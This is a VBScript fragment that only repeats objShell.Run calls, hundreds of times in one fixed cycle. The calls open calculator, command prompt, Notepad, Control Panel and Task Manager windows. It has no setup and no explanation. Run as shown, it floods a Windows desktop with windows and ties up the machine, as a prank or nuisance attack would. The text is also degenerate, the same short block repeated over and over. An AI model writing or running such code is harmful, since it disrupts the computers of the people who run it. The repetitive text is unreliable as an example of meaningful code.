objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
